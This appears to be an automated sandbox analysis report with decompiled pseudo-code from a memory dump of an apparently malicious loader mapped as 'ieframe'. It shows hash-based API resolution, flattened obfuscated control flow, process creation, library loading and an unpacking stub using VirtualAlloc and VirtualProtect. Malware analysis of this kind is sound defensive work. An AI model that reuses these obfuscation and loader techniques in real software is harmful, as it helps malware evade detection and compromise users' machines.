                                                        control_flow_graph 283 327120 284 327125-32712a 283->284 285 327130 284->285 286 3271b4-3271b9 284->286 287 327233-327248 call 3234c0 285->287 288 327136-32713b 285->288 289 327207-32720c 286->289 290 3271bb 286->290 307 327265-327278 LoadLibraryW 287->307 308 32724a-327260 call 323f00 call 323e60 287->308 293 327190-327195 288->293 294 32713d 288->294 291 327227-32722c 289->291 292 32720e-327222 call 327080 289->292 296 3271ee-327202 call 327080 290->296 297 3271bd-3271c2 290->297 291->284 304 327232 291->304 292->284 293->291 303 32719b-3271af call 327080 293->303 305 32717a-32718e call 327080 294->305 306 32713f-327144 294->306 296->284 299 3271c4-3271c9 297->299 300 3271d5-3271e9 call 327080 297->300 299->291 309 3271cb-3271d0 299->309 300->284 303->284 305->284 315 327146-32714b 306->315 316 327164-327178 call 327080 306->316 321 327295-3272a0 307->321 322 32727a-327290 call 323f00 call 323e60 307->322 308->307 309->284 315->291 317 327151-327162 call 327080 315->317 316->284 317->284 335 3272a2-3272b8 call 323f00 call 323e60 321->335 336 3272bd-3272c5 321->336 322->321 335->336
                                                        C-Code - Quality: 85%
                                                        			E00327120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E003234C0(0x32d830);
                                                        							__eflags =  *0x32dd1c;
                                                        							if( *0x32dd1c == 0) {
                                                        								 *0x32dd1c = E00323E60(_t21, E00323F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x32e548; // 0x937e08
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x32e494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E00323E60(_t21, E00323F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x32e494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x32df30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E00323E60(_t21, E00323F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x32df30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E00327080(_t21, 0x32d7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E00327080(_t21, 0x32d8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E00327080(_t21, 0x32d800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E00327080(_t21, 0x32d860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E00327080(_t21, 0x32d890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E00327080(_t21, 0x32d7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E00327080(_t21, 0x32d8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x00327120
                                                        0x00327120
                                                        0x00327120
                                                        0x00327125
                                                        0x00327125
                                                        0x00327125
                                                        0x00327125
                                                        0x0032712a
                                                        0x00000000
                                                        0x00000000
                                                        0x00327130
                                                        0x0032723f
                                                        0x00327246
                                                        0x00327248
                                                        0x00327260
                                                        0x00327260
                                                        0x00327266
                                                        0x00327268
                                                        0x0032726e
                                                        0x00327271
                                                        0x00327276
                                                        0x00327278
                                                        0x0032728b
                                                        0x00327290
                                                        0x00327290
                                                        0x00327297
                                                        0x00327299
                                                        0x0032729e
                                                        0x003272a0
                                                        0x003272b3
                                                        0x003272b8
                                                        0x003272b8
                                                        0x003272c5
                                                        0x00327136
                                                        0x00327136
                                                        0x0032713b
                                                        0x00327190
                                                        0x00327195
                                                        0x00000000
                                                        0x0032719b
                                                        0x003271a5
                                                        0x003271aa
                                                        0x00000000
                                                        0x003271aa
                                                        0x0032713d
                                                        0x0032713d
                                                        0x00327184
                                                        0x00327189
                                                        0x00000000
                                                        0x0032713f
                                                        0x00327144
                                                        0x0032716e
                                                        0x00327173
                                                        0x00000000
                                                        0x00327146
                                                        0x00327146
                                                        0x0032714b
                                                        0x00000000
                                                        0x00327151
                                                        0x00327158
                                                        0x0032715d
                                                        0x00000000
                                                        0x0032715d
                                                        0x0032714b
                                                        0x00327144
                                                        0x0032713d
                                                        0x0032713b
                                                        0x00000000
                                                        0x00327130
                                                        0x003271b4
                                                        0x003271b9
                                                        0x00327207
                                                        0x0032720c
                                                        0x00000000
                                                        0x0032720e
                                                        0x00327218
                                                        0x0032721d
                                                        0x00000000
                                                        0x0032721d
                                                        0x003271bb
                                                        0x003271bb
                                                        0x003271f8
                                                        0x003271fd
                                                        0x00000000
                                                        0x003271bd
                                                        0x003271bd
                                                        0x003271c2
                                                        0x003271df
                                                        0x003271e4
                                                        0x00000000
                                                        0x003271c4
                                                        0x003271c4
                                                        0x003271c9
                                                        0x00000000
                                                        0x003271cb
                                                        0x003271cb
                                                        0x00000000
                                                        0x003271cb
                                                        0x003271c9
                                                        0x003271c2
                                                        0x003271bb
                                                        0x00000000
                                                        0x00327227
                                                        0x00327227
                                                        0x00327227
                                                        0x00327232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003268AC), ref: 00327266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9
                                                        • API String ID: 1029625771-121480178
                                                        • Opcode ID: a7654fac2e21e60f8127e9140b303a8c5c1e61c76af3e6157d0ccb9d585db983
                                                        • Instruction ID: fa6928d01deae616f307c8ef0396edc35b828376e12a29918ea84dff4b1d294d
                                                        • Opcode Fuzzy Hash: a7654fac2e21e60f8127e9140b303a8c5c1e61c76af3e6157d0ccb9d585db983
                                                        • Instruction Fuzzy Hash: 8C31B530B0D23083DB276ABA78A176E11AEFFA0704F71446AF151CFB95DD2ADD124392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 324b70-324b80 344 324b82-324b98 call 323f00 call 323e60 343->344 345 324b9d-324bba 343->345 344->345 350 324bd7-324bf5 CreateProcessW 345->350 351 324bbc-324bd2 call 323f00 call 323e60 345->351 354 324c73-324c7a 350->354 355 324bf7-324bfd 350->355 351->350 357 324c14-324c1b 355->357 358 324bff-324c13 355->358 360 324c38-324c45 357->360 361 324c1d-324c33 call 323f00 call 323e60 357->361 367 324c62-324c72 360->367 368 324c47-324c5d call 323f00 call 323e60 360->368 361->360 368->367
                                                        C-Code - Quality: 60%
                                                        			E00324B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x32ddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00323E60(__ebx, E00323F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x32ddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x32e21c == 0) {
                                                        					 *0x32e21c = E00323E60(_t26, E00323F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x32de3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E00323E60(_t26, E00323F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x32de3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x32de3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E00323E60(_t26, E00323F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x32de3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x00324b70
                                                        0x00324b70
                                                        0x00324b70
                                                        0x00324b79
                                                        0x00324b7c
                                                        0x00324b80
                                                        0x00324b93
                                                        0x00324b98
                                                        0x00324b98
                                                        0x00324ba6
                                                        0x00324bb0
                                                        0x00324bba
                                                        0x00324bd2
                                                        0x00324bd2
                                                        0x00324bf1
                                                        0x00324bf5
                                                        0x00324c7a
                                                        0x00324bf7
                                                        0x00324bfd
                                                        0x00324c14
                                                        0x00324c1b
                                                        0x00324c2e
                                                        0x00324c33
                                                        0x00324c33
                                                        0x00324c3c
                                                        0x00324c3e
                                                        0x00324c45
                                                        0x00324c58
                                                        0x00324c5d
                                                        0x00324c5d
                                                        0x00324c66
                                                        0x00324c72
                                                        0x00324bff
                                                        0x00324bff
                                                        0x00324c05
                                                        0x00324c13
                                                        0x00324c13
                                                        0x00324bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00324BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: 6b1fc3108f9e711e24e143d06add3de1ac82ee4981b73fd431e8b1539b151230
                                                        • Instruction ID: 09f230d71dad72851cfe0a3fba454a80b5f2cba9bd8a68db0447d82f57de430f
                                                        • Opcode Fuzzy Hash: 6b1fc3108f9e711e24e143d06add3de1ac82ee4981b73fd431e8b1539b151230
                                                        • Instruction Fuzzy Hash: BE21A3317043216BEB26AB7EEC41BBB37AAABD0B04F11442CF554CF290FA74D9059B51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 457 3230a0-3230b6 458 3230ba-3230bf 457->458 459 3230c0-3230c5 458->459 460 323201-323206 459->460 461 3230cb 459->461 464 323245-32324c 460->464 465 323208-32320d 460->465 462 3230d1-3230d6 461->462 463 3231ed-3231f1 461->463 470 3231da-3231e8 462->470 471 3230dc-3230e1 462->471 468 3232f6-323300 463->468 469 3231f7-3231fc 463->469 466 323269-323274 464->466 467 32324e-323264 call 323f00 call 323e60 464->467 472 323213-323218 465->472 473 3232ab-3232b3 465->473 492 323291-32329f RtlAllocateHeap 466->492 493 323276-32328c call 323f00 call 323e60 466->493 467->466 469->459 470->459 477 3231a0-3231a8 471->477 478 3230e7-3230ec 471->478 479 32321a-323228 call 323d00 472->479 480 32322d-323232 472->480 474 3232d3-3232f3 473->474 475 3232b5-3232cd call 323f00 call 323e60 473->475 474->468 475->474 486 3231aa-3231c2 call 323f00 call 323e60 477->486 487 3231c8-3231d5 477->487 478->480 484 3230f2-32319b 478->484 479->458 480->459 488 323238-323242 480->488 484->458 486->487 487->458 492->468 500 3232a1-3232a6 492->500 493->492 500->458
                                                        C-Code - Quality: 71%
                                                        			E003230A0() {
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t61;
                                                        				intOrPtr* _t62;
                                                        				void* _t65;
                                                        				intOrPtr _t93;
                                                        				intOrPtr* _t95;
                                                        				intOrPtr _t107;
                                                        				intOrPtr* _t116;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				intOrPtr _t129;
                                                        				signed int _t134;
                                                        				void* _t135;
                                                        				void* _t136;
                                                        
                                                        				_t93 =  *((intOrPtr*)(_t135 + 0xc));
                                                        				_t61 = 0x11f367c2;
                                                        				_t134 =  *(_t135 + 0x10);
                                                        				_t129 =  *((intOrPtr*)(_t135 + 0x14));
                                                        				_t127 =  *(_t135 + 0x18);
                                                        				while(1) {
                                                        					L1:
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t136 = _t61 - 0x12466c01;
                                                        							if(_t136 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t136 == 0) {
                                                        								if(_t93 !=  *(_t135 + 0x18)) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									_t61 = 0x2f21cdd2;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t61 == 0x7a26146) {
                                                        									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
                                                        									continue;
                                                        								} else {
                                                        									if(_t61 == 0x8928514) {
                                                        										_t95 =  *0x32e1cc;
                                                        										if(_t95 == 0) {
                                                        											_t95 = E00323E60(_t93, E00323F00(0x55ab7d30), 0x815a9da3, _t134);
                                                        											 *0x32e1cc = _t95;
                                                        										}
                                                        										_t129 =  *_t95(_t134 + 0x2c);
                                                        										_t61 = 0x39d78901;
                                                        										while(1) {
                                                        											L1:
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										if(_t61 != 0x11f367c2) {
                                                        											goto L18;
                                                        										} else {
                                                        											 *(_t135 + 0x18) = 0x2e7c;
                                                        											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
                                                        											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
                                                        											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
                                                        											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
                                                        											 *(_t135 + 0x10) = 0xa461;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
                                                        											_t61 = 0x8928514;
                                                        											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
                                                        											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
                                                        											while(1) {
                                                        												L1:
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L30:
                                                        						}
                                                        						if(_t61 == 0x2f21cdd2) {
                                                        							_t62 =  *0x32e494;
                                                        							if(_t62 == 0) {
                                                        								_t62 = E00323E60(_t93, E00323F00(0x9bab0b12), 0x7facde30, _t134);
                                                        								 *0x32e494 = _t62;
                                                        							}
                                                        							_t128 =  *_t62();
                                                        							if( *0x32dd18 == 0) {
                                                        								 *0x32dd18 = E00323E60(_t93, E00323F00(0x9bab0b12), 0x9ff0609c, _t134);
                                                        							}
                                                        							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
                                                        							_t127 = _t65;
                                                        							if(_t127 == 0) {
                                                        								goto L29;
                                                        							} else {
                                                        								_t61 = 0x35eaa088;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							if(_t61 == 0x35eaa088) {
                                                        								_t116 =  *0x32e43c;
                                                        								if(_t116 == 0) {
                                                        									_t116 = E00323E60(_t93, E00323F00(0x9bab0b12), 0x2df4d385, _t134);
                                                        									 *0x32e43c = _t116;
                                                        								}
                                                        								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
                                                        								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
                                                        								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
                                                        								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
                                                        								 *(_t107 + 0x1c) = _t127;
                                                        								goto L29;
                                                        							} else {
                                                        								if(_t61 != 0x39d78901) {
                                                        									goto L18;
                                                        								} else {
                                                        									_t93 = E00323D00(_t129);
                                                        									_t61 = 0x7a26146;
                                                        									while(1) {
                                                        										L1:
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L30;
                                                        						L18:
                                                        					} while (_t61 != 0x100ad7b4);
                                                        					return 1;
                                                        					goto L30;
                                                        				}
                                                        			}



















                                                        0x003230a2
                                                        0x003230a6
                                                        0x003230ac
                                                        0x003230b1
                                                        0x003230b6
                                                        0x003230ba
                                                        0x003230ba
                                                        0x003230c0
                                                        0x003230c0
                                                        0x003230c0
                                                        0x003230c0
                                                        0x003230c5
                                                        0x00000000
                                                        0x00000000
                                                        0x003230cb
                                                        0x003231f1
                                                        0x003232f9
                                                        0x00323300
                                                        0x003231f7
                                                        0x003231f7
                                                        0x00000000
                                                        0x003231f7
                                                        0x003230d1
                                                        0x003230d6
                                                        0x003231e5
                                                        0x00000000
                                                        0x003230dc
                                                        0x003230e1
                                                        0x003231a0
                                                        0x003231a8
                                                        0x003231c0
                                                        0x003231c2
                                                        0x003231c2
                                                        0x003231ce
                                                        0x003231d0
                                                        0x003230ba
                                                        0x003230ba
                                                        0x00000000
                                                        0x003230ba
                                                        0x003230e7
                                                        0x003230ec
                                                        0x00000000
                                                        0x003230f2
                                                        0x003230f2
                                                        0x0032310d
                                                        0x00323111
                                                        0x0032311f
                                                        0x00323123
                                                        0x00323130
                                                        0x00323139
                                                        0x00323147
                                                        0x0032314b
                                                        0x00323153
                                                        0x0032315b
                                                        0x00323175
                                                        0x0032317f
                                                        0x00323187
                                                        0x0032318b
                                                        0x00323193
                                                        0x003230ba
                                                        0x003230ba
                                                        0x00000000
                                                        0x003230ba
                                                        0x003230ba
                                                        0x003230ec
                                                        0x003230e1
                                                        0x003230d6
                                                        0x00000000
                                                        0x003230cb
                                                        0x00323206
                                                        0x00323245
                                                        0x0032324c
                                                        0x0032325f
                                                        0x00323264
                                                        0x00323264
                                                        0x0032326b
                                                        0x00323274
                                                        0x0032328c
                                                        0x0032328c
                                                        0x00323299
                                                        0x0032329b
                                                        0x0032329f
                                                        0x00000000
                                                        0x003232a1
                                                        0x003232a1
                                                        0x00000000
                                                        0x003232a1
                                                        0x00323208
                                                        0x0032320d
                                                        0x003232ab
                                                        0x003232b3
                                                        0x003232cb
                                                        0x003232cd
                                                        0x003232cd
                                                        0x003232e4
                                                        0x003232e6
                                                        0x003232ed
                                                        0x003232f0
                                                        0x003232f3
                                                        0x00000000
                                                        0x00323213
                                                        0x00323218
                                                        0x00000000
                                                        0x0032321a
                                                        0x00323221
                                                        0x00323223
                                                        0x003230ba
                                                        0x003230ba
                                                        0x00000000
                                                        0x003230ba
                                                        0x003230ba
                                                        0x00323218
                                                        0x0032320d
                                                        0x00000000
                                                        0x0032322d
                                                        0x0032322d
                                                        0x00323242
                                                        0x00000000
                                                        0x00323242

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 00323299
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: |.
                                                        • API String ID: 1279760036-512043466
                                                        • Opcode ID: 5b2c6218b68131e4fab41df7855b4e8e89ee15758e6a80fab865c4a26dffeb4e
                                                        • Instruction ID: 41aa1ee782fecbf5b30c5e8e79d396ee1863ec7fc5a738db2bd7b6a6cc53dabb
                                                        • Opcode Fuzzy Hash: 5b2c6218b68131e4fab41df7855b4e8e89ee15758e6a80fab865c4a26dffeb4e
                                                        • Instruction Fuzzy Hash: A151D171B083218BC719DF6CE48556ABBEAEBD4304F20481EF452CB751DB39DA498B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 508 310580-3105be call 310ed0 511 3105c0-3105cf 508->511 512 3105d2-3105da 508->512 513 3105e0-3105e3 512->513 514 3106e7-3106ef 512->514 513->514 515 3105e9-3105eb 513->515 515->514 516 3105f1-3105fc 515->516 516->514 518 310602-310607 516->518 519 3106d8-3106e4 518->519 520 31060d-310629 call 311140 RtlMoveMemory 518->520 523 310654-310659 520->523 524 31062b-310630 520->524 527 31065b-31066a 523->527 528 31066c-310678 523->528 525 310643-310652 524->525 526 310632-310641 524->526 529 310679-310699 call 311140 525->529 526->529 527->529 528->529 529->514 532 31069b-3106a3 VirtualProtect 529->532 533 3106a5-3106a8 532->533 534 3106c6-3106d5 532->534 533->514 535 3106aa-3106ad 533->535 535->514 536 3106af-3106b1 535->536 536->520 537 3106b7-3106c3 536->537
                                                        APIs
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0031061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0031069C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: 95879ccceb97e22c8759db7989ad07bf5db49c9d6942580a3fcf66631f0209b7
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: 953156B365420557E32DDA69DC85BEBA3C4EBED350F08083AFA05D2280D5AED4E8C265
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 538 325ce0-325cec call 3265e0 541 325d09-325d0d ExitProcess 538->541 542 325cee-325d04 call 323f00 call 323e60 538->542 542->541
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E003265E0();
                                                        				if( *0x32ddb8 == 0) {
                                                        					 *0x32ddb8 = E00323E60(_t5, E00323F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x00325ce0
                                                        0x00325cec
                                                        0x00325d04
                                                        0x00325d04
                                                        0x00325d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 00325D0B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 2177058fa3dbe1f037167b403c73ca34b52b7d81846935de96061d45564caf82
                                                        • Instruction ID: 3fefe0dd08cdd0c4249489a56717845d87531de8510a839ae1cf3acfbdcf0eaf
                                                        • Opcode Fuzzy Hash: 2177058fa3dbe1f037167b403c73ca34b52b7d81846935de96061d45564caf82
                                                        • Instruction Fuzzy Hash: C7D0123178462447DF56ABB5784676A259E4FE0748F10401DF411CF29AFE34CD11B790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 547 310ad0-310b31 call 310ed0 550 310b33-310b42 547->550 551 310b47-310b4d 547->551 552 310d40 550->552 553 310b5f-310b7b 551->553 554 310b4f-310b54 551->554 556 310b90 553->556 557 310b7d-310b8e 553->557 554->553 558 310b96-310b9c 556->558 557->558 560 310bae-310bca 558->560 561 310b9e-310ba3 558->561 563 310bd7-310c21 VirtualAlloc 560->563 564 310bcc-310bd4 560->564 561->560 568 310c27-310c2e 563->568 569 310d1a-310d24 563->569 564->563 570 310c30-310c3f 568->570 571 310c44-310c4b 568->571 569->552 570->552 572 310c5d-310c79 571->572 573 310c4d-310c52 571->573 575 310c86-310c8d 572->575 576 310c7b-310c83 572->576 573->572 577 310c9f-310cbb 575->577 578 310c8f-310c94 575->578 576->575 580 310cc8-310cfa VirtualAlloc 577->580 581 310cbd-310cc5 577->581 578->577 584 310d02-310d07 580->584 581->580 584->569 585 310d09-310d18 584->585 585->552
                                                        APIs
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00310BFF
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
